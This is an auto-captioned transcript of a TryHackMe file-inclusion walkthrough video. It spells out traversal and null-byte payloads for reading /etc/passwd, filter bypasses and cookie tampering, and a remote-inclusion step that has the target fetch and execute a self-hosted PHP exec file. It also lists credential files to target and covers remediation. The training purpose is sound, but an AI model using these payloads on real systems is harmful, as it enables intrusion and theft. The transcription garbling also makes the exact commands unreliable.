File Inclusion - TryHackMe Junior Penetration Tester 3.6

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hi and Welcome to our eighth lesson in Trey Hackney's Junior pen testing learning path last week we learned how to exploit and find insecure direct object references in a web application giving us access to data that we shouldn't have this lesson we're introducing file inclusion vulnerabilities including local file inclusion or lfi remote file inclusion RFI and directory traversal it's gonna be a fun one let's get to it so first things first you want to go ahead and drop down into your Junior penetration tester learning dashboard as you can see we've already completed an introduction to pen testing and we're now beginning our sixth lesson in intro to web hacking go ahead and let's jump right into file inclusion I want to preface this by saying that if you're having connection problems go ahead and look at my content Discovery video 2.2 and I address some of those issues there and how you can get back online reconnected so I said just that if you're continuing with this learning path you may want to upgrade as well so that you aren't locked out pretty much be able to do as many rooms as you want and you won't have to worry about waiting that 24 hours this room aims to equip you with Essential Knowledge to explain inclusion vulnerabilities including local file inclusion remote file inclusion and directory traversal also we will discuss the risk of these vulnerabilities if they're found and the required remediation we provide some practical examples of each vulnerability as well as Hands-On challenges in some scenarios web applications are written to request access to files on a given System including images static text and so on Via parameters parameters are query parameter strings attached to the URL that could be used to retrieve data or perform actions based on user input and here we can see a nice graph listing the URL in all different parts of a URL HTTP is going to be their protocol domain name is the first line of that URL they only have our file name which is get.ph HP a question mark begins our query string and that's where we get to the parameter which in this case would be file and then it equals whatever file they are looking for for example parameters are used with Google searching where get requests pass user input into the search engine so you can see that queue here marks the query and the user input would be try hack me so this is someone doing a simple Google search for triagme if you're not familiar with a topic you can view the how the web Works module to understand the concept and here we go how the web works foreign how the web works is exactly what it sounds like it's teaching you a little bit more about the World Wide Web including DNS HTTP and how websites work together I might add that to exploit a website it's good to know how one is created so if you're interested I encourage you to go ahead and check that out let's discuss a scenario where a user requests to access files from a web server first the user sends an HTTP request to the web server that includes a file to display for example if a user wants to access and display their CV within the web application the request may look as follows and then here we have the protocol HTTP the domain name is webapp.thm the file name which is get.php the query string begins with the question mark the usercv.pdf required file to access here's a good look at a user requesting that PDF file from the web app that's going through the cloud or some server and then the get request is over here towards the application and our app is linked to www which represents the World Wide Web if we go down we can see that the CV is actually stored in the web application first the user can request that PDF file why do file inclusion vulnerabilities even happen final inclusion vulnerabilities are commonly found and exploited in various programming languages for web applications such as PHP that are poorly written and implemented the main issue of these vulnerabilities is that input validation in which the user inputs are not sanitized or validated and the user controls them when the input is not validated the user can pass any input to the function causing the vulnerability guys this is going to be a recurring theme throughout your pen testing Journey which is that if you don't have an input validation or sanitization there's going to be a lot of problems that can occur it is the risk of file inclusion it depends if the attacker can use file inclusion vulnerabilities to read sensitive data in that case the successful attack causes to leak of sensitive data including code and files related to the web application credentials for backend systems moreover if the attacker somehow can write to the server such as temp directory then it is possible to gain remote command execution rce however it won't be effective if file inclusion vulnerability is found with no access to sensitive data and no writing ability to the server no answer needed let's continue to the next section to deploy the attack deploy the attached VM to follow and apply the technique as well as do the challenges in order to access this VM please make sure to connect to the trihackery network via openvpn or access it directly from the attack box alright guys I'm going to be using the attack box today if you want to know how to use the openvpn and if you're having any connection issues go ahead and watch my last video 2.2 on content Discovery and we're just going to wait for the IP address to show up it should take around 60 seconds okay now that our IP has been populated and we have a new link right we're going to click on the attack box and start our machine up and we'll wait for that IP address to show up it should take around 60 seconds all right our attack box is up and running let's go ahead and go full screen for a little bit and once you've got this attack box up and running go ahead and open a new web browser once you see the try Hackman landing page go ahead and copy that link that was presented to us in task two and put it there at the top you can't copy and paste but all you have to do is just type the MP address HTTP colon slash and then the IP address in my case it'd be 10.10.60.121 slash and here we are where you should see local file inclusion vulnerability and path traversal path traversal is also known as directory Traverse a web security vulnerability allows an attacker to read operating system resources such as local files on the server running an application the attacker exploits this vulnerability by manipulating and abusing the web application's URL to locate and access files of directly stored outside the application's root directory path traversal vulnerabilities occur when the user's input is passed to a function such as file get contents and PHP it's important to note that the function is not the main contributor to the vulnerability often poor input validation or filtering is the cause of the vulnerability so you hear that guy it's not because of the user that's inputting validation maybe not doing the best job it's because of the developer it's actually create a system where there's no sanitization PHP you can use the file get contents to read the content of a file you can find more information about the function here here we have a little more detailed information about that PHP function as you can see we have a string a Boolean and that's about it then they have the parameters the return values and any errors or exceptions they even give you examples this one written in PHP will actually give you the output of a specific home page for a website following graph shows a web application stores files in VAR www app the happy path would be the user requesting the contents of a usercv.pdf from a defined path VAR www app CV so as you can see the hacker is requesting from the web app and going all the way down into the directory of the Etsy which contains the password file the get request goes to the app and then is pushed all the way to the Etsy folder which then pops the passwords content back in visible Plain Sight we can test out the URL parameter by adding payloads to see how the web application behaves path traversal attacks also known as the dot dot slash attack take advantage of moving the directory one step up using the double dots and then the forward slash if the attacker finds the entry point which in this case git.php with a parameter of file then the attacker may send something as follows they'll take that file equals and drill down into the directory to see if they can find anything that's worth any value Suppose there isn't any input validation and instead of accessing the PDF files at VAR www app CVS location the web application retrieves files from other directories which in this case Etsy passwords.entry moves One Directory until it reaches the root directory or simply forward slash then it changes the directory to slash Etsy and from there you can read the password file if you're all familiar with a Linux system you may see the similarities between this web server and a simple Linux system there's really not too much that's different we can see the root directory which is indicated by a slash and as we go down we go into VAR www app and then the CVS folder however if someone was able to find this current path and then instead of CVS they wanted to see maybe if there's a password file they would be able to Simply change the url path and try and retrieve that password file as a result the web application sends back the files content to the user here we have the protocol HTTP the domain name is web app.th gem then the file name is PHP remember that the question mark marks the beginning of our query search then the file traverses the directory path all the way to boot.ini or they can try windows and going down into the win.ini folder the same concept applies here as with Linux operating systems where we climb up directories until it reaches the root directory which is either the C colon backslash sometimes developers will add filters to limit access to only certain files or directories below are some common OS files you can use when testing let's go ahead and check these out so for the location of etsy issue this contains messages or system identification to be printed before the login prompt Etsy profile control system y default variables such as export variables file creation mask or UMass terminal types mail messages to indicate when new mail has arrived slash proc slash version specifies the version of the Linux kernel slash Etsy slash password has all registered users that has access to the system this is often sought after by hackers Etsy Shadow is also sought after by hackers and it contains the information about the system's user's passwords root dot bash underscore history contains the history commands for the root user this could be good if you're doing some forensic investigation work and trying to figure out what commands the hacker used once they got into your system slash VAR slash log slash D message contains global system messages including the messages that are logged during system startup slash VAR slash mail slash root is all the emails for the root user root.ssh ID underscore RSA is the private SSH keys for root or any known valid user on the server VAR log apache2 access.log is the access request for Apache web server last but not least in the C directory forward slash boot.ini that contains the boot options for computers with bios firmware what function causes path traversal vulnerabilities in PHP and did you get it you remember that the function file underscore get underscore contents can actually cause directory traversal with PHP go ahead and copy that and paste it there we go pretty straightforward if you want the contents file get contents task 4 local file inclusion lfi lfi attacks against web applications are often due to a developers lack of security awareness with PHP using functions such as include require include ones and require ones often contribute to vulnerable web application in this room we'll be picking on PHP but it's worth noting lfi vulnerabilities also occur when using other languages such as asp.jsp or even node.js lfi exploits follow the same Concepts as path traversal in this section we will walk you through various lfi scenarios and how to exploit it suppose the web application provides two languages and the user can select between the en and the AR here we can see the language PHP the include function with get in Lane the PHP code above uses a get request via the URL parameter link to include the file of the page a call can be done by sending the following HTTP request as follows HTTP web app.thm index.php question mark Lang equals ex.php to load the English page or ar.php to load the Arabic page where en.php and ar.php files exist in the same directory that means there could be others theoretically we can access and display any readable file on the server from the code above there isn't any input validation let's say we want to read the Etsy password file which contains sensitive information about the users of the Linux operating system we can try the following file equals Etsy password in this case it works because there isn't a directory specified in the include function and no input validation now apply what we discussed in trying to read SC slash password file file answer question number one below go back to your attack box or your VPN page and go ahead and click Lab One let's go ahead and give it a try with welcome.php we see that our current path is VAR www.html and we can even see the content preview of welcome.php indicating that there's really not any sanitization under the password file we do slash Etc password or p-a-s-swd you can see the entire preview of the Etsy password file we can see that there's mail news and different accounts and usernames that have passwords looks like also their user IDs and also permissions a whole slew of different directories and their permissions are released traditionally the Etsy password file first field is for the username the second field is for the password the Third Field is for the user ID fourth field is for group ID this field is there any comments the sixth field is for the group directory the sixth field is for the home directory and the seventh field is their log shell so we take that slash lab1.php question mark starting the query and then file equals parameter and then we can see that this would be Etsy and this would be password go ahead and put that in Etsy slash password we've got it correct all right guys let's move on to number two next in the following code the developer decided to specify the directory inside the function include languages and then have the get Lang function and the above code the developer decided to use the include function to call PHP pages and the languages directory only via Lang parameter if there's no input validation the attacker can manipulate the URL by replacing the Lang input with other OS sensitive files such as Etsy passwords such as Etc password again the payload looks similar to the path traversal but the include function allows us to include any called files into the current page the following will be the exploit here we have the exploit which is protocol HTTP web app.thm is the domain name our file name is a PHP file and then the question mark starts our query after that we use the Lang parameter equals and followed by the specific directory we want which is going to be Etsy password now apply what we discussed try to read files within the server and figure out the directory specified in the include function we're going to try to apply what we discussed and read the files within the server in lab number two go back to your home page which includes all the different Labs just the IP address of the machine that you started go ahead and click lab number two who to file in the input form below if we do slash Etsy slash password see the file content preview if you're stuck it's okay to take one of those hints you can see one of the hints for this question is try to enter an invalid input to check the error messages well we've already done that and this actually pops up a warning saying fail to open stream no such file or directory in VAR www.html lab2 dot PHP online 26. so it's asking us what is the directory specified in the include function well as you can see from this error message it failed opening includes Etc password for inclusion and the function was includes it was including the includes function that's why you want to include input validation all right let's go to task 5 local file inclusion number two in this task we'll go a little bit deeper into lfi we discussed a couple of techniques to bypass the filter within the include function in the first two cases we checked the code for the web app and then we knew how to exploit it checking the code is an important step however in this case we're performing Black Box testing in which we don't have the source code in this case errors are significant in understanding how the data is passed and processed into the web app in this scenario we have the following entry point HTTP webop.thm index.php and then Lang equals en which stands for English if we enter an invalid input such as THM we get the following error warning include languages slash thm.php it failed to open the stream because no subscribe or directory was in the VAR www.html thm-4 index.php file on line 12. the error message discloses significant information by entering THM as input any error message shows what the include function looks like which is include languages thm.php look at the directory closely we can tell the function includes files in the languages directory by adding dot PHP at the end of the entry thus the valid input will be something as false index.php start our query laying equals em where the file en is located inside the given languages directory named en.php also the error message disclosed another important piece of information about the full web application directory path which is VAR www.html thm-4 to exploit this we need to use the dot dot slash trick as described in the directory traversal section to get out of the current folder let's try the following HTTP web app.thm index.php question mark laying equals and then dot dot forward slash dot dot forward slash until we reach the Etsy password file note that we used four dot dot four slash because we know the path has four levels VAR www HTML and then thm-4 but we still receive the following error warning include languages and then we have our forward slashes and dots with the scpassword.php failure to open stream no such file directory in VAR www HTML THM dashboard index.php online 12. it seems we could move out of the PHP directory but still the include function reads the input with DOT PHP at the end this tells us that the developer specifies the file type to pass to the include function we don't need the need to dot PHP if the developer made it automatic for us to bypass this scenario we can use the null byte which is percent 0 0. using no bytes is an injection technique where URL encoded representation such as percent 0 0 or 0x00 and hex with user Supply data to terminate string you could think of it as trying to trick the web app into disregarding whatever comes after the null byte by adding the null byte at the end of the payload we tell the include function to ignore anything after the null by which may look like include languages then we have our include function with dots and the forward slashes the ETC password file but then we include our null byte percent zero zero then we have the PHP which is equivalent to include the languages and then all the way to the Etsy password file and note that the percent zero zero trick is fixed and not working with PHP 5.3.4 and above which is why it's important to update and Patch your web applications fast now apply what we showed in lab number three and try to read files Etc password by answering question number one below okay let's scroll down and give lab number three a try to read Etsy password what does the request look like well let's go back to our machine and go back to home and go to lab number three let's just do a simple slash Etc password and see what kind of messages we get let's take the hint aha don't trust the input form insert into the browser address bar so we already know that it's most likely going to be forward slash la lab3.php question mark file equals now we have to figure out what parameter we're going to use to try and get that Etsy password file previously we found out that there's going to be four levels so we'll go ahead and try dot dot slash dot dot slash dot dot slash dot dot slash four slashes eight dots then we can get rid of that and we'll do Etc slash password and instead of just doing Etc password we're going to try a null buy and do percent zero zero pretty much ignore anything after that press enter and we're given the Etsy password file nice job guys all right we can go ahead and copy that as the answer question one there all right number two in this section the developer decided to filter keywords to avoid disclosing sensitive information the Etsy password file is being filtered however there are two possible methods to bypass the filter first by using the null byte percent zero zero or the current directory trick at the end of the filtered keyword forward slash Dot and exploit will be similar to the query Lang equals Etsy password but we could also use the query Ling equals Etsy password and then the null byte to make it clear if we try this concept in the file system using CD space dot dot it will get you back one step however if you do CD and then just one dot it stays in the current directory much like a Linux system similarly if we try Etsy password slash dot dot it results to be Etsy and that's because we move one to the root now if we try Etsy password and just one dot results will be at the password we'll stay in the same place since dot refers to the current directory now apply this technique in lab number four and figure out how to read the Etsy password file so back in our attack machine we'll go back to the home and lab number four and the question is which function is causing the directory traversal in lab number four we'll go ahead and do the slash Etsy slash password and see what comes up you are not allowed to see a source file so they know we're trying to look for those source files and the developer has set up a precaution so let's go ahead and do slash Etsy password and then slash Dot if we press enter we'll see that we are indeed staying in that same file and not jumping back because we did a single dot but if when we do link equals slash Etsy slash password and give it a go get the warning that the file cannot be found because there's no such directory in VAR www htmlab4.php online 29. and the question is which function is causing the director traversal in lab number four that would be the function file underscore get underscore contents boom answer is correct this is number three next in the following scenarios the developer starts to use input validation by filtering some keywords Let's test out and check the error message assuming we go back to home then go into lab 5. we'll try out the query link equals our four slashes and dots with the slash Etsy slash password and see what happens we do Lang equals dot dot slash dot dot slash dot dot slash dot dot slash DTC slash password we had a similar include error message failing to open the stream because no file director was found in the bar www HTML lab5.php file so if we check the warning message in the include languages Etsy password section we know that the web application replaces the dot dot slash with the empty string there are a couple of techniques we can use to bypass this first we can send the following payload to bypass a series of four dots and two slashes for each directory that we're trying to hop in this case it'll be one two three four five and then followed by Etsy slash password we can try that out now dot dot dot dot slash slash dot dot dot dot slash slash dot dot dot dot slash dot dot dot dot slash followed by Etsy slash password and boom there we go guys so why did that work this works because the PHP filter only matches and replaces the first substance string doesn't do another pass leaving what is pictured below so as you can see we are putting in extra dots and slashes because it automatically takes those things out so we're left with a command of Simply eight dots and four slashes giving us the Etsy password file we already tried that out in lab number five and read the Etsy password filed bypassing the filter all right number four finally we'll discuss the case with the developer forces the include to read from a defined directory for example if the web application asks to supply input that has to include a directory such as the query laying equals languages slash en PHP then to exploit this we would need to include the directory in the payload like so question mark way equals languages and then our 10 dots and five forward slashes followed by the Etsy slash password try this out lavender 6 and figure out what the directory has to be in the input field we'll go back to home and go to the last lab number six so we'll do question mark Lang equals languages slash dot dot two three four five and slash Etsy slash password see what that brings up this is a case of giving us too much feedback that a hacker can actually use to try and get in the system it says access denied allowed files at THM Dash profile this is the folder that we're going to need to include to perform our attack go ahead and do THM Dash profile that's the correct answer right on lab number six and read Etsy OS Dash release and what version is the ID value so as you can see right here if you look closely it says for example thm- profile slash try hackme.txt so we'll do THM Dash profile and then slash Etsy slash OS Dash release go ahead and hit that so instead of the languages directory we're going to use THM Dash profile so we'll do a question mark Lang equals and then we will do THM Dash profile and then slash Etc slash OS Dash release and see what that brings out one two three four five then we'll do slash Etsy instead of pass we're gonna do slash OS Dash release and Bob your uncle we have just found that OS releases five as you can see the version ID is 12.04 so we'll go ahead and copy that and bring it back over let's keep chugging ahead I'm going to task six remote file inclusion remote file inclusion is a technique to include remote files and into a vulnerable application like local file inclusion the RFI occurs when improperly sanitizing user input allowing an attacker to inject an external URL into include functions One requirement for RFI is that the allow underscore URL underscore F open option needs to be on the risk of remote file inclusion is higher than local file inclusion since remote file inclusion vulnerabilities allow an attacker to gain remote command execution rce on the server other consequences of a successful remote file inclusion attack include sensitive information disclosure cross-site scripting and denial of service an external server must communicate with the application server for a successful RFI attack where the attacker hosts malicious files on their server then the malicious files in injected into the include function via HTTP requests and the content of the malicious file executes on the vulnerable application server as you can see the hacker sends out a request with a remote URL HTTP attacker.thm with their malicious executable that gets sent to the server in a get request and so the text file is sent back from the server to the web application injects the content of that cmd.txt into the include function before executing that function those results are sent back to the hacker within the get.php page we can see the cmd.txt file here just simply hello THL remote battle inclusion steps the following figure is an example of steps for a successful RFI attack let's say that the attacker hosts a PHP file on their own server attacker.thm cmd.txt where cmd.txt contains a printing message hello THM first the attacker injects the malicious URL which points to the attacker's server such as query Lang equals and then the URL leading to their file if there is no input validation then the malicious URL passes into the include function next the web server will send a get request to the malicious server to fetch the file as a result the web app includes the remote file into include function to execute the PHP file within the page and sends the execution content to the attacker in our case the current page somewhere has to show the hello THM message visit the following lab URL to trial and RFI attack so you can follow the link that's presented back in your attack box or you can simply go to home and there should be a playground button or tab so as you can see we're here in the playground you can pretty much try any technique that you want I actually tried going ahead and using their same cmd.txt to see if anything would happen turns out that there was just an there but I was able to find there was an include function you can simply do the ETC password file go ahead and click complete all right now it's time to gain rce and lab playground with remote file inclusion to execute the hostname command let's go back to the main page and go to playground so remote file inclusion is basically a reverse shell right it's redirecting the web server to download a malicious file that may execute on the target machine if you've never executed a remote shell before boy are you in for a treat look something like HTTP one slash slash and then the IP address playground.php then the question mark for our query and we'll do file equals HTTP colon slash lead to the file on our web server now the include function will make the request to shell.php download it and execute it on the target that's the danger of include functions open up a new terminal window and start a web server you can do this by doing sudo python3 dash n and http.server you can click this little s for Sublime Text and we'll open up a new notepad for you you can actually create our own executable so we're going to write this in PHP and simply do print exec and we're going to do host name so this is just going to basically tell us the host name if this is successful if it is downloaded and executed on the web application it'll do a question mark and another bracket to close it and that's it you can save that in the default root directory as cmd.txt go ahead and save and close and take a note of our IP address this is what the web server is going to connect to after we send this so we're going to copy that and in the playground put in HTTP colon slash the tech machine in IP and then the playground.php start our query file equals and now it's time to put in the URL to our web server this is going to be HTTP colon slash slash and then rip address you don't know your IP address you can simply go into the command line and check it out right here or you can run the command ifconfig make sure that those are periods between each number and then a colon for the port and we're going to use port 8000 forward slash cmd.txt and it was successful you guys have just now run your first remote file inclusion we're going to copy that hostname and that'll be our answer as a developer it's important to be aware of web application vulnerability how to find them in prevention methods to prevent the file inclusion vulnerabilities some common suggestions include number one keep system and services including web application Frameworks updated with the latest version number two turn off PHP errors to avoid leaking the path of the application and other potentially revealing information number three a web application firewall or WAFF is a good option to help mitigate web application attacks number four disable some PHP features that cause file inclusion vulnerabilities if your web app doesn't need them don't use them such as allow URL F open and allow URL include number five carefully analyze the web application and allow only protocols and PHP wrappers that are in need number six never trust user input and make sure to implement proper input validation against file inclusion and lastly number seven Implement white listing for file names and locations as well as blacklisting it's all about that input validation guys it'll keep your web application secure go ahead yeah we can move to our final task if you're up for it the task 8 Challenge great job now to apply the techniques you've learned to capture the flags familiarizing yourself with HTTP web Basics couldn't help complete these challenges make sure the attached VM is up and running then visit the URL challengesindex.php we're going to go over here to our URL and instead of playground we're going to go to challenges slash index.php all right we've made it to the file collusion lab challenges looks like there's three of them we will click challenge number one steps for testing for local file inclusion find an entry point that could be via get post cookie or HTTP header values the input form is broken you need to send post requests with file parameter we'll go ahead and try simple welcome.php and it returns nothing looks like it's broken if we look at the hint for question one it says change the form method to post in the page Source or use a tool like burp to modify the method of the request post and click in here and go to inspect element form starts right here and the method is get so ideally we would go in here and change this to post and then put in this specific file we're looking for which in this case happens to be Etc flag one but it can be a little tricky in the web developer tool so you can also use two tools like burp sweep or just do it from the command line open up a new terminal box and type in curl which just stands for client URL you're basically just an information a website see what kind of response would come back so in this case Dash X for request command and then we're going to do Post which is the method and then we're going to type in the URL for me that's HTTP colon slash n.10.122.123 slash challenges slash Channel One Dot PHP just the same IP address as the one they give you over here and then you can actually go back and it says challenges channel1.php so we'll go into that web page back to the terminal.1.php and we're going to do Dash D for data single tag method equals get and Ampersand file equals and then type in the name of the file slash Etsy slash flag one another single tack to enclose that so essentially this is going to show us what it would look like we could actually post that file because as the form is broken we're actually going to use the command line to see what would the response be well go ahead and press enter and as you can see final content preview of etsy flag one is right here we have the flag so we can go ahead and copy that put it in you've captured the first flag for the challenge nice job guys that was a little tricky and not obvious especially for beginners all right now that we've captured that flag let's go to challenge number two it says refresh the page please so we'll go ahead and refresh the page welcome guest only admins can access this page well let's go ahead and open a tool called burp Suite all you have to do is go to web and click burp Suite Community Edition group tweet is going to be your best friend when you're trying to pen test web applications go ahead and click temporary project and start burp if we look at the hint for captured flag 2 we can see it says check your cookies burp Suite is actually really good at doing this if we go into proxy let's open a browser and once you've got burp Suite up and running ahead and click burp on this foxy proxy icon up in the right hand corner foxyproxy is the action extension that allows burp Suite to see all the traffic in Iraq with the web pages that we see in our web browser so after you do that go ahead and refresh the page you should be able to see in burp Suite get request that was submitted to either get challenges challenge two everything that looks good we see here that there's an option called cookie and guess what we can change that let's go ahead and change that to admin if you want to forward that to the webpage just go ahead and click forward now let's see what happens back to your web browser check it out and there we go it says welcome ad this is the admin webpage get the flag so it looks like we have a couple more steps to do and refresh the page then go to burp Suite we should be able to see the request again instead of just doing admin let's try getting the flag to slash Etc flag 2 which according to over here is the file that we're trying to get so we go ahead and forward that well it looks like there was a couple error messages first off we can see that there's two forward slashes means that this include function adds an extra forward slash and it looks like extension for DOT PHP we can fix that in burp Suite go ahead and refresh the page go back to burp suite and get rid of guests and put just BTC without the forward slash slash flag two and then to get rid of that extension we'll do percent and to get rid of that extension we'll use something that we learned about in this lesson called a null byte percent zero zero and we'll go ahead and forward that back to the web browser and boom it looks like everything is looking a lot better looking for exactly the file that's wanted remove the extra slash and gotten rid of that extension however now it's time to tie all these things together use what's called directory traversal looks like it's not getting to the root directory so give it one more refresh go back to burp Suite we're going to go up four levels so do dot dot slash dot dot slash dot dot slash dot dot slash that should take us to the root folder where we can go to Etsy and flag two then add the note bite and go ahead and forward that go back to the web browser and we'd begin the flag the cookie is yummy go ahead and claim the loot and you can paste that over in the answer box for flag two guys once again a little Advanced but burp Suite is something that you'll be using more and more in these lessons all right let's go to Challenge three so include a file in the input form below it's expecting a welcome so let's go ahead and do but well met alright so our current path equals the directory VAR dub dub dub html3.php is what handles the form viewing files under the same directory although similar to the last challenge depending the dot PHP extend to the input so we're going to go up to the URL where our query starts we're going to go file equals then we're going to do some direct return reversal with four levels dot dot slash dot dot slash dot dot slash dot dot slash Etc flag three and then we're going to add a null byte so that maybe that extension will go away click in the error shows that the slash has vanished between flag and Etc but also the dot PHP extension remains this is good sign for the web developer it means that they're probably using some kind of sanitization we're going to change the url again only this time we're going to add two more dots one slash four and then press enter we're still getting that error well if we check out the hint we can see that not everything is filtered the website uses dollar sign underscore requests to accept HTTP requests I know let's go back to the command line and try curling it and open up a command line I'm going to do curl x and we're going to do the post method with and then the URL for me it's going to be 10.10.14.3 slash challenges slash child three PHP and then we'll do Dash D for data and we're gonna do attack method equals post and file equals dot dot dot dot slash slash dot dot dot dot slash and dot dot dot dot slash and Etc flag three and they will add the note byte we'll do a closing tag and we'll do dash dash output in another Dash and we'll see if it works click enter oh look at that post work include function is trying to request a file and there's no chain which means we don't need to add any extra slashes or dots just needed to change the request method from get to post so in that case we'll do curl and then we'll get rid of these extra slash within dots three and we'll give it a go Aha and the final content preview of flag three is post is working way to go guys nice job working your way through go ahead and copy that put it as an answer for flag three you guys just finished file inclusion lesson I'm so happy for you guys I'm glad that you stuck around just to be clear it looks like there's no filtering in the application all we need to do is change the method to post however when we're looking at the web application it doesn't exactly tell us to do that a lot of times as a pen tester it'll be up to your own intuition to try and discover that for yourself in fact we may be able to do this just by changing the method and actually getting rid of all the directory traversal dots and slashes all that we'll need is slash Etc and slash flag with the null button and there we go nice we may not even need the nobody let's try it out nope I guess you do need it I want to remind you guys that it's going to learn more of these Concepts they're going to become more powerful that means more responsibility for us as penetration testers because with great power comes great responsibility

Info

Channel: Brock Hard Security

Views: 5,246

Rating: undefined out of 5

Keywords: tryhackme, penetration testing, pentester, how to, lesson 8, introduction, web hacking, beginner, free course, ethical hacking, cybersecurity, cyber security, how to hack, hacking tutorial, junior, free, training, what is file inclusion, file inclusion, file inclusion example, finding file inclusion in, deploy the vm, path traversal, directory traversal, local file inclusion, lfi, lfi#2, lfi #2, remote file inclusion, rfi, rce in lab, remediation, challenge, answers, explained, walkthrough

Id: Qt6L6q17TZ4

Channel Id: undefined

Length: 44min 2sec (2642 seconds)

Published: Fri Mar 24 2023